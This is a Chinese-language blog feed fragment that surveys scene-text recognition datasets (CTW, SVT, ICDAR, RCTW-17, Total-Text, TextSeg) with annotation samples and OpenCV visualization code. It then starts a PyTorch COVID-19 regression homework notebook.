    img11.jpg

    ​ 对应的 Text_Region_Mask Ground Truth img11.png

    webp

    img11.png

    ​ 还附有 mat 格式的 poly_gt_img11.matrect_gt_img11.mat,应该是存储了一些形状信息。

    TextSeg

    ​ 资源:Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach

    ​ 艺术字的文字分割数据集:

    • 4024 张图片,配有文字分割图

    ​ 举例,对于数据集下image/的文件 a00001.jpg

    webp

    a00001.jpg

    bpoly_label/ 下对应的逐字分割掩码图a00001_mask.png

    webp

    ​ json 文件 a00001_anno.json

    {
    "0000": {
    "text": "WHY",
    "bbox": [
    300,
    264,
    799,
    264,
    799,
    521,
    300,
    521
    ],
    "char": {
    "00": {
    "text": "W",
    "bbox": [
    304,
    270,
    519,
    270,
    519,
    517,
    304,
    517
    ],
    "mask_value": 1
    },
    "01": {
    "text": "H",
    "bbox": [
    514,
    278,
    650,
    278,
    650,
    521,
    514,
    521
    ],
    "mask_value": 2
    },
    "02": {
    "text": "Y",
    "bbox": [
    651,
    272,
    800,
    272,
    800,
    521,
    651,
    521
    ],
    "mask_value": 3
    }
    }
    },
    "0001": {
    "text": "ME?",
    "bbox": [
    334,
    514,
    762,
    514,
    762,
    764,
    334,
    764
    ],
    "char": {
    "00": {
    "text": "M",
    "bbox": [
    336,
    513,
    518,
    513,
    518,
    761,
    336,
    761
    ],
    "mask_value": 4
    },
    "01": {
    "text": "E",
    "bbox": [
    514,
    514,
    639,
    514,
    639,
    761,
    514,
    761
    ],
    "mask_value": 5
    },
    "02": {
    "text": "?",
    "bbox": [
    637,
    517,
    758,
    517,
    758,
    762,
    637,
    762
    ],
    "mask_value": 6
    }
    }
    }
    }

    semantic_label/ 下的分割图 a00001_maskfg.png

    webp

    a00001_maskfg.png

    CTW 1500

    • [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…/…/…/…/2023/07/14/Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)

    合成数据集

    SynthText

    • [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/04/21/Paper-Synthetic Data for Text Localisation in Natural Images/)

    • [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…/…/…/…/2023/09/05/Paper-重读-Synthetic Data for Text Localisation in Natural Images/)

    VISD

    • [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…/…/…/…/2023/08/25/Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)

    SynthText3D

    • [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…/…/…/…/2023/09/12/Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)

    UnrealText

    • Plan-对论文的目前想法-Zi-Zi’s Journey

    • [Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World-Zi-Zi’s Journey](…/…/…/…/2023/05/23/Paper-UnrealText-Synthesizing Realistic Scene Text Images from the Unreal World/)

    ]]>
    + 前言

    ​ 收集一下有关文本的各种数据集!感谢师兄的分享。

    正文

    真实数据集

    CTW 数据集 (Chinese Text in the Wild)

    一个自然场景下的中文字符数据集。

    ​ 资源:

    ​ 包含:

    • 32,285 张高分辨率图像(high resolution images)
    • 1,018,402 个字符实例(character instances)
    • 3850 种汉字(character categories)
    • 6 种类别(attributes)

    ​ 数据集结构:

    webp

    • 训练集 + 验证集:images-trainval
    • 测试集:images-test
    • 预训练好的模型:trained-models
      • alexnet
      • inception
      • overfeat
      • resnet
      • vgg
      • yolo
    • 注释文档:ctw-annotations

    webp

    ​ 举例,对于训练数据集下的文件 0000172.jpg

    webp

    0000172.jpg
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    {"annotations": [[
    {
    "adjusted_bbox": [140.26028096262758, 897.1957001682758, 22.167573140645146, 38.36424196832945],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[140.26028096262758, 896.7550603352049], [162.42785410327272, 898.0769798344178], [162.42785410327272, 935.7929346470926], [140.26028096262758, 935.0939571156308]],
    "text": "\u660e"
    },
    {
    "adjusted_bbox": [162.42785410327272, 898.5416545674744, 23.376713493771263, 37.74268246537315],
    "attributes": ["distorted", "raised"],
    "is_chinese": true,
    "polygon": [[162.42785410327272, 898.0769798344178], [185.80456759704398, 899.4710040335876], [185.80456759704398, 936.5300382257251], [162.42785410327272, 935.7929346470926]],
    "text": "\u6d77"
    },
    ……
    "image_id": "0000172", "width": 2048}

    ​ 对应的注释,每个字都有:

    • adjusted_bbox:调整后的边界框

    • attributes:文字属性

      • distorted:扭曲
      • raised:浮雕
      • occluded:被遮挡
      • bgcomplex:复杂背景
      • handwritten:手写
      • wordart:艺术字
    • is_chinese:是否为中文

    • polygon:实际边界框

    • text:以 Unicode 形式存储的中文

    SVT (Street View Text Dataset)

    The Street View Text (SVT) dataset was harvested from Google Street View. Image text in this data exhibits high variability and often has low resolution. In dealing with outdoor street level imagery, we note two characteristics.

    (1) Image text often comes from business signage and

    (2) business names are easily available through geographic business searches.

    These factors make the SVT set uniquely suited for word spotting in the wild: given a street view image, the goal is to identify words from nearby businesses.

    街景文本SVT)数据集从谷歌街景中获取。该数据中的图像文本表现出很高的变异性,而且往往分辨率很低。在处理户外街景图像时,我们注意到两个特点。

    (1) 图像文本通常来自于商业招牌,以及

    (2) 企业名称很容易通过地理上的商业搜索获得。

    这些因素使得 SVT 集独特地适合于在野外发现单词:给定一个街景图像,目标是识别附近企业的单词。

    ​ 资源:

    ​ 举例,对于数据集下的文件 17_18.jpg

    webp

    17_18.jpg

    ​ 对应的 Ground Truth,一个单词一个文本框,还包含了地址、环境等信息:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    <image>
    <imageName>img/17_18.jpg</imagesName>
    <address>420 South 1st Street San Jose CA 95112</address>
    <lex>SOUTH,FIRST,BILLIARDS,CLUB,AND,LOUNGE,AGENDA,RESTAURANT,BAR,RAMADA,LIMITED,SAN,JOSE,WET,NIGHTCLUB,MOTIF,ANNO,DOMINI,EULIPIA,DOWNTOWN,YOGA,SHALA,WHIPSAW,INC,ZOE,SAINTE,CLAIRE,HOTEL,SCORES,SPORTS,GRILL,WORKS,SPY,MUSEUM,QUILTS,TEXTILES,MIAMI,BEACH,STAGE,COMPANY,CACTUS,ANGELS,DAI,THANH,SUPERMARKET</lex>
    <Resolution x="1024" y="768"/>
    <taggedRectangles>
    <taggedRectangle height="41" width="152" x="480" y="403">
    <tag>BILLIARDS</tag>
    </taggedRectangle>
    <taggedRectangle height="33" width="78" x="407" y="410">
    <tag>FIRST</tag>
    </taggedRectangle>
    <taggedRectangle height="30" width="85" x="322" y="416">
    <tag>SOUTH</tag>
    </taggedRectangle>
    </taggedRectangles>
    </images>

    ICDAR

    ​ 资源:

    Downloads - Focused Scene Text

    Task 2.1: Text Localization (2013 edition)
    • 训练集 229 张图片
    • 测试集 233 张图片

    ​ 举例,对于训练数据集下的文件 img_1.jpg

    webp

    img_1.jpg

    ​ 对应的 Ground Truth gt_img_1.txt

    1
    2
    3
    4
    5
    6
    7
    8
    9
    38, 43, 920, 215, "Tiredness"
    275, 264, 665, 450, "kills"
    0, 699, 77, 830, "A"
    128, 705, 483, 839, "short"
    542, 710, 938, 841, "break"
    87, 884, 457, 1021, "could"
    517, 919, 831, 1024, "save"
    166, 1095, 468, 1231, "your"
    530, 1069, 743, 1206, "life"

    ​数据集可视化代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 1

    image_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task12_Images/'
    label_dir = r'XXX/ICDAR 2013/Challenge2_Test_Task1_GT/'

    image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1][2:-2]
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    cv2.rectangle(image, (points[0][0], points[0][1]), (points[1][0], points[1][1]), (255, 0, 0), 2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    webp

    Task 2.2: Text Segmentation (2013 edition)

    ​ 数据集和 2.1 一样,只不过 Ground Truth 是 segmentation masks gt_img_1.png

    webp

    gt_img_1.png
    Task 2.3: Word Recognition (2013 edition)
    • 训练集 848 张单词图片:Challenge2_Training_Task3_Images_GT
    • 测试集 1095 张单词图片:Challenge2_Test_Task3_ImagesChallenge2_Test_Task3_GT.txt

    ​ 这些图片都是从之前的数据集里裁切出来的。

    ​ 举例,对于训练数据集下的文件 word_1.jpg

    webp

    word_1.png

    ​ 对应的 Ground Truth gt.txt 里的一行:

    1
    word_1.png, "PROPER"
    Task 2.4: End to End (2015 edition)

    想让网络识别单词,并且提供了单词库?

    • 训练集 229 张图片
    • 测试集 233 张图片

    ​ 图片img_1.jpg,对应的 Ground Truth gt_img_1.txt 和词汇表 voc_img_1.txt

    webp

    img_1.jpg、gt_img_1.txt、voc_img_1.txt

    Downloads - Incidental Scene Text

    Task 4.1: Text Localization (2015 edition)

    ​ 图像质量真是刁钻啊 orz

    • 训练集 1000 张图片
    • 测试集 500 张图片

    ​ 举例,对于测试数据集下的文件 img_2.jpg

    webp

    img_2.jpg

    ​ 对应的 Ground Truth gt_img_2.txt

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    790,302,903,304,902,335,790,335,JOINT
    822,288,872,286,871,298,823,300,yourself
    641,138,657,139,657,151,641,151,###
    669,139,693,140,693,154,669,153,154
    700,141,723,142,723,155,701,154,197
    637,101,721,106,722,115,637,110,###
    668,157,693,158,693,170,668,170,727
    636,155,661,156,662,169,636,168,198
    660,82,700,85,700,99,660,96,20029
    925,252,973,254,973,262,925,262,###
    789,284,818,284,818,297,789,297,Free
    875,286,902,289,903,298,875,298,from
    791,337,863,337,863,364,791,364,PAIN
    794,445,818,445,818,473,794,473,###
    922,440,962,442,963,462,922,463,###
    924,476,967,476,968,489,924,491,###
    924,505,962,506,965,518,923,519,###
    847,524,887,524,887,555,847,555,###
    791,474,822,474,822,500,791,500,###
    780,582,910,576,909,583,780,588,###
    854,456,902,455,902,465,854,467,###
    854,467,903,467,903,480,854,480,###

    ​数据集可视化代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    import cv2
    import os
    import matplotlib.pyplot as plt
    import numpy as np

    index = 463

    image_dir = r'XXX/ICDAR_2015/test_img/'
    label_dir = r'XXX/ICDAR_2015/test_gt/'

    image_path = os.path.join(image_dir, 'img_' + str(index) + '.jpg')
    label_path = os.path.join(label_dir, 'gt_img_' + str(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords = list(map(int, annotation.split(',')[:-1]))
    transcriptions = annotation.split(',')[-1]
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    webp

    1
    2
    1111,459,1266,495,1259,586,1104,550,FESTIVE
    1100,523,1261,603,1244,719,1083,639,SALE
    Task 4.2: Text Segmentation (N/A)

    ​ 不可用。

    Task 4.3: Word Recognition (2015 edition)

    ​ 从上一个数据集中裁剪出单词图片。

    • 训练集 4468 张裁剪好的单词图片
    • 测试集 2077 张裁剪好的单词图片

    ​ 举例,对于测试数据集下的文件 word_10.png

    webp

    word_10.png

    ​ 对应 Challenge4_Test_Task3_GT.txt 里的一行:

    1
    word_10.png, "PAIN"
    Task 4.4: End to End (2015 edition)

    ​ emmmm 我感觉就是之前的整合,多了一个词汇表。

    • 训练集 1000 张图片
    • 测试集 500 张图片

    webp

    ICDAR2017 Competition on Reading Chinese Text in the Wild (RCTW-17)

    这里面的图像是有够杂的……

    资源:

    webp

    ​ 举例,对于训练数据集下的文件 image_0.jpg

    webp

    image_0.jpg

    ​ 对应的 Ground Truth image_0.txt

    ​ 包围框,是否有可识别的文字,对应文字

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    390,902,1856,902,1856,1225,390,1225,0,"金氏眼镜"
    1875,1170,2149,1170,2149,1245,1875,1245,0,"创于 1989"
    2054,1277,2190,1277,2190,1323,2054,1323,0,"城建店"
    768,1648,987,1648,987,1714,768,1714,0,"金氏眼"
    897,2152,988,2152,988,2182,897,2182,0,"金氏眼镜"
    1457,2228,1575,2228,1575,2259,1457,2259,0,"金氏眼镜"
    1858,2218,1966,2218,1966,2250,1858,2250,0,"金氏眼镜"
    231,1853,308,1843,309,1885,230,1899,1,"谢#惠顾"
    125,2270,180,2270,180,2288,125,2288,1,"###"
    106,2297,160,2297,160,2316,106,2316,1,"###"
    22,2363,82,2363,82,2383,22,2383,1,"###"
    524,2511,837,2511,837,2554,524,2554,1,"###"
    455,2456,921,2437,920,2478,455,2501,0,"欢迎光临"

    Total-Text

    ​ 资源:Total-Text Dataset | Papers With Code

    ​ 弯曲文本数据集:

    • 训练集 1255 张图片
    • 测试集 300 张图片

    ​ 大部分英文文本,少部分中文文本。

    ​ 举例,对于训练数据集下的文件 img11.jpg

    webp

    img11.jpg

    ​ 对应的 Character_Level_Mask Ground Truth img11.jpg

    webp

    img11.jpg

    ​ 对应的 Text_Region_Mask Ground Truth img11.png

    webp

    img11.png

    ​ 还附有 mat 格式的 poly_gt_img11.matrect_gt_img11.mat,应该是存储了一些形状信息。

    TextSeg

    ​ 资源:Rethinking Text Segmentation: A Novel Dataset and A Text-Specific Refinement Approach

    ​ 艺术字的文字分割数据集:

    • 4024 张图片,配有文字分割图

    ​ 举例,对于数据集下image/的文件 a00001.jpg

    webp

    a00001.jpg

    bpoly_label/ 下对应的逐字分割掩码图a00001_mask.png

    webp

    ​ json 文件 a00001_anno.json

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    {
    "0000": {
    "text": "WHY",
    "bbox": [
    300,
    264,
    799,
    264,
    799,
    521,
    300,
    521
    ],
    "char": {
    "00": {
    "text": "W",
    "bbox": [
    304,
    270,
    519,
    270,
    519,
    517,
    304,
    517
    ],
    "mask_value": 1
    },
    "01": {
    "text": "H",
    "bbox": [
    514,
    278,
    650,
    278,
    650,
    521,
    514,
    521
    ],
    "mask_value": 2
    },
    "02": {
    "text": "Y",
    "bbox": [
    651,
    272,
    800,
    272,
    800,
    521,
    651,
    521
    ],
    "mask_value": 3
    }
    }
    },
    "0001": {
    "text": "ME?",
    "bbox": [
    334,
    514,
    762,
    514,
    762,
    764,
    334,
    764
    ],
    "char": {
    "00": {
    "text": "M",
    "bbox": [
    336,
    513,
    518,
    513,
    518,
    761,
    336,
    761
    ],
    "mask_value": 4
    },
    "01": {
    "text": "E",
    "bbox": [
    514,
    514,
    639,
    514,
    639,
    761,
    514,
    761
    ],
    "mask_value": 5
    },
    "02": {
    "text": "?",
    "bbox": [
    637,
    517,
    758,
    517,
    758,
    762,
    637,
    762
    ],
    "mask_value": 6
    }
    }
    }
    }

    semantic_label/ 下的分割图 a00001_maskfg.png

    webp

    a00001_maskfg.png

    CTW 1500

    • [Paper-Detecting Curve Text in the Wild-New Dataset and New Solution-Zi-Zi’s Journey](…//Paper-Detecting Curve Text in the Wild-New Dataset and New Solution/)

    合成数据集

    SynthText

    • [Paper-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…//Paper-Synthetic Data for Text Localisation in Natural Images/)

    • [Paper-重读-Synthetic Data for Text Localisation in Natural Images-Zi-Zi’s Journey](…//Paper-重读-Synthetic Data for Text Localisation in Natural Images/)

    VISD

    • [Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes-Zi-Zi’s Journey](…//Paper-Verisimilar Image Synthesis for Accurate Detection and Recognition of Texts in Scenes/)

    SynthText3D

    • [Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds-Zi-Zi’s Journey](…//Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds/)

    UnrealText

    ]]>
    @@ -6665,7 +6665,7 @@ /posts/Pytorch-%E6%94%BE%E4%B8%80%E6%94%BE%E4%B9%8B%E5%89%8D%E7%9C%8B%E7%9A%84%E4%B8%80%E4%BA%9B%E4%BB%A3%E7%A0%81/ - Homework 1: COVID-19 Cases Prediction (Regression)

    Objectives:

    • Solve a regression problem with deep neural networks (DNN).
      • 用 DNN 解决回归问题
    • Understand basic DNN training tips.
      • 了解 DNN 的训练技巧
    • Familiarize yourself with PyTorch.
      • 熟悉 Pytorch

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    # check gpu type
    !nvidia-smi
    Tue May  2 06:43:11 2023       +-----------------------------------------------------------------------------+| NVIDIA-SMI 525.85.12    Driver Version: 525.85.12    CUDA Version: 12.0     ||-------------------------------+----------------------+----------------------+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC || Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. ||                               |                      |               MIG M. ||===============================+======================+======================||   0  Tesla T4            Off  | 00000000:00:04.0 Off |                    0 || N/A   60C    P8    11W /  70W |      0MiB / 15360MiB |      0%      Default ||                               |                      |                  N/A |+-------------------------------+----------------------+----------------------+                                                                               +-----------------------------------------------------------------------------+| Processes:                                                                  ||  GPU   GI   CI        PID   Type   Process name                  GPU Memory ||        ID   ID                                                   Usage      ||=============================================================================||  No running processes found                                                 |+-----------------------------------------------------------------------------+

    Download data

    If the Google Drive links below do not work, you can use the dropbox link below or download data from Kaggle, and upload data manually to the workspace.

    如果下面的 Google Drive 链接不起作用,您可以使用下面的 dropbox 链接或从 Kaggle 下载数据,然后手动将数据上传到工作区。

    # google drive link
    # !gdown --id '1BjXalPZxq9mybPKNjF3h5L3NcF7XKTS-' --output covid_train.csv
    # !gdown --id '1B55t74Jg2E5FCsKCsUEkPKIuqaY7UIi1' --output covid_test.csv

    # dropbox link
    !wget -O covid_train.csv https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0
    !wget -O covid_test.csv https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0
    --2023-05-02 06:43:11--  https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0Resolving www.dropbox.com (www.dropbox.com)... 162.125.1.18, 2620:100:6016:18::a27d:112Connecting to www.dropbox.com (www.dropbox.com)|162.125.1.18|:443... connected.HTTP request sent, awaiting response... 302 FoundLocation: /s/raw/lmy1riadzoy0ahw/covid.train.csv [following]--2023-05-02 06:43:11--  https://www.dropbox.com/s/raw/lmy1riadzoy0ahw/covid.train.csvReusing existing connection to www.dropbox.com:443.HTTP request sent, awaiting response... 302 FoundLocation: https://uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com/cd/0/inline/B7R_XAdqGQ7y45IwWWr91JE9O5ftQ1LzcdRGRkGnWhDV7CbEgZ1gwBymu8fh5bpaPWp9zICKowq6MjrON0BR4nSmqUicNGD370j62Mq2GXwtl0e-8qpV5Oi-x6JOi1bcQMGLMbska_B9vEIgQgpg2S6ny5XiLPOameEMqLg9dA_Eog/file# [following]--2023-05-02 06:43:11--  https://uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com/cd/0/inline/B7R_XAdqGQ7y45IwWWr91JE9O5ftQ1LzcdRGRkGnWhDV7CbEgZ1gwBymu8fh5bpaPWp9zICKowq6MjrON0BR4nSmqUicNGD370j62Mq2GXwtl0e-8qpV5Oi-x6JOi1bcQMGLMbska_B9vEIgQgpg2S6ny5XiLPOameEMqLg9dA_Eog/fileResolving uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com (uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com)... 162.125.1.15, 2620:100:6016:15::a27d:10fConnecting to uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com (uc5421dd31d98edf16e9af0f0b3d.dl.dropboxusercontent.com)|162.125.1.15|:443... connected.HTTP request sent, awaiting response... 200 OKLength: 2162766 (2.1M) [text/plain]Saving to: ‘covid_train.csv’covid_train.csv     100%[===================>]   2.06M  4.86MB/s    in 0.4s    2023-05-02 06:43:12 (4.86 MB/s) - ‘covid_train.csv’ saved [2162766/2162766]--2023-05-02 06:43:13--  https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0Resolving www.dropbox.com (www.dropbox.com)... 162.125.1.18, 2620:100:6016:18::a27d:112Connecting to www.dropbox.com (www.dropbox.com)|162.125.1.18|:443... connected.HTTP request sent, awaiting response... 302 FoundLocation: /s/raw/zalbw42lu4nmhr2/covid.test.csv [following]--2023-05-02 06:43:13--  https://www.dropbox.com/s/raw/zalbw42lu4nmhr2/covid.test.csvReusing existing connection to www.dropbox.com:443.HTTP request sent, awaiting response... 302 FoundLocation: https://uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com/cd/0/inline/B7T1uyyfVM4P3twEWZx3H4-pVXJ-c4Y5vMd0jVufeZ8aideA5_Zpgz2vdLvJjQsnLRbk7gffgKO4b2TWtNHYcAbfYb4YLQNQd7oa3etDtxXpWd1xxwoSg_emm6WNprlrzqzAFbQVh448Xp2PGEai1MO7BatFrLvH4to5CoOCRBs9Zg/file# [following]--2023-05-02 06:43:13--  https://uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com/cd/0/inline/B7T1uyyfVM4P3twEWZx3H4-pVXJ-c4Y5vMd0jVufeZ8aideA5_Zpgz2vdLvJjQsnLRbk7gffgKO4b2TWtNHYcAbfYb4YLQNQd7oa3etDtxXpWd1xxwoSg_emm6WNprlrzqzAFbQVh448Xp2PGEai1MO7BatFrLvH4to5CoOCRBs9Zg/fileResolving uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com (uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com)... 162.125.1.15, 2620:100:6016:15::a27d:10fConnecting to uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com (uc77577a7cac975663cf90524f71.dl.dropboxusercontent.com)|162.125.1.15|:443... connected.HTTP request sent, awaiting response... 200 OKLength: 638359 (623K) [text/plain]Saving to: ‘covid_test.csv’covid_test.csv      100%[===================>] 623.40K  --.-KB/s    in 0.04s   2023-05-02 06:43:14 (16.9 MB/s) - ‘covid_test.csv’ saved [638359/638359]

    Import packages

    # Numerical Operations 数值运算
    import math
    import numpy as np

    # Reading/Writing Data 读写数据
    import pandas as pd
    import os
    import csv

    # For Progress Bar 进度条
    from tqdm import tqdm

    # Pytorch
    import torch
    import torch.nn as nn
    from torch.utils.data import Dataset, DataLoader, random_split

    # For plotting learning curve 绘制损失函数曲线
    from torch.utils.tensorboard import SummaryWriter

    Some Utility Functions

    一些实用程序函数

    You do not need to modify this part.

    def same_seed(seed): 
    '''
    Fixes random number generator seeds for reproducibility.
    固定随机数种子以获得可复现性。
    '''
    torch.backends.cudnn.deterministic = True # 将 CuDNN 的随机性设置为确定性模式,这是为了确保每次运行时 CuDNN 生成的随机数列是一样的。
    torch.backends.cudnn.benchmark = False # 禁用 CuDNN 的自动调整功能,避免出现由于 CuDNN 自动调整导致的运行时间不稳定的情况。
    np.random.seed(seed) # 设置 NumPy 库的随机数种子,如果程序中有使用到 NumPy 生成的随机数,也可以保证其生成的随机数序列是一致的。
    torch.manual_seed(seed) # 设置 PyTorch 的 CPU 随机数种子。
    if torch.cuda.is_available(): # 如果 GPU 可用,则设置 PyTorch 的 GPU 随机数种子。
    torch.cuda.manual_seed_all(seed)

    def train_valid_split(data_set, valid_ratio, seed):
    '''
    Split provided training data into training set and validation set
    将提供的训练数据拆分为训练集和验证集
    '''
    valid_set_size = int(valid_ratio * len(data_set)) # 根据验证集所占比例和数据集的大小,计算出验证集的大小
    train_set_size = len(data_set) - valid_set_size # 通过数据集的总大小和验证集的大小计算出训练集的大小
    '''
    使用 random_split 函数将 data_set 随机划分为训练集和验证集,
    具体来说,
    函数的第一个参数是要划分的数据集,
    第二个参数是一个列表,表示训练集和验证集的大小,列表的元素按照训练集和验证集的顺序排列,
    第三个参数是用于生成随机数的生成器,需要手动设置随机数种子
    '''
    train_set, valid_set = random_split(data_set, [train_set_size, valid_set_size], generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set) # 将训练集和验证集转换为 NumPy 数组格式,并返回

    def predict(test_loader, model, device):
    '''
    用于在给定的测试集上使用已训练好的神经网络模型进行预测并返回预测结果。
    test_loader:一个 PyTorch 的 DataLoader 对象,用于逐批次地加载测试数据;
    model:一个已训练好的神经网络模型;
    device:指定计算设备,如"cpu"或者"cuda"。
    '''
    model.eval() # Set your model to evaluation mode. 函数调用 model.eval()将模型设置为评估模式(即在推断过程中不会进行梯度计算,以加速运行)
    preds = [] # 定义一个空列表 preds 用于存储每个批次的预测结果。
    for x in tqdm(test_loader): # 通过一个循环来逐批次地遍历 test_loader 中的测试数据
    x = x.to(device) # 将当前的批次数据 x 移动到指定的设备上(如 GPU 设备)
    with torch.no_grad(): # 关闭梯度计算的上下文环境,以减少内存占用和加快计算速度
    pred = model(x) # 对当前批次的数据进行预测
    preds.append(pred.detach().cpu()) # 将预测结果 pred 附加到 preds 列表中
    '''
    在所有批次预测结束后,使用 torch.cat 函数将所有预测结果沿着指定维度(通常是批次维度)拼接成一个大的张量,并将其转换为 NumPy 数组格式返回
    '''
    preds = torch.cat(preds, dim=0).numpy()
    return preds

    Dataset

    class COVID19Dataset(Dataset):
    '''
    x: Features. 特征
    y: Targets, if none, do prediction. 标签,如果为空,则做 prediction
    '''
    def __init__(self, x, y=None):
    if y is None:
    self.y = y # 设为 none
    else:
    self.y = torch.FloatTensor(y) # 转成 tensor 格式
    self.x = torch.FloatTensor(x)

    def __getitem__(self, idx):
    if self.y is None:
    return self.x[idx] # 返回标签
    else:
    return self.x[idx], self.y[idx] # 返回特征和对应的标签

    def __len__(self):
    return len(self.x) # 返回数据集长度

    Neural Network Model

    Try out different model architectures by modifying the class below.

    通过修改下面的类来尝试不同的模型体系结构。

    class My_Model(nn.Module):  # 声明了一个自定义的 PyTorch 神经网络模型,继承自 nn.Module
    def __init__(self, input_dim): # 定义了该神经网络模型的初始化方法。参数 input_dim 表示输入张量的维度
    super(My_Model, self).__init__() # 调用父类的初始化方法,即 nn.Module 中的__init__()方法,来初始化该自定义模型。
    # TODO: modify model's structure, be aware of dimensions.
    '''
    self.layers 声明了一个由多个层和激活函数组成的神经网络模型,
    用于传递输入数据并输出预测结果。
    其中,nn.Sequential()表示将多个层按顺序组合在一起,组成一个网络模型。
    3 个线性层,2 个 ReLU 激活函数
    '''
    self.layers = nn.Sequential(
    nn.Linear(input_dim, 16),
    nn.ReLU(),
    nn.Linear(16, 8),
    nn.ReLU(),
    nn.Linear(8, 1)
    )

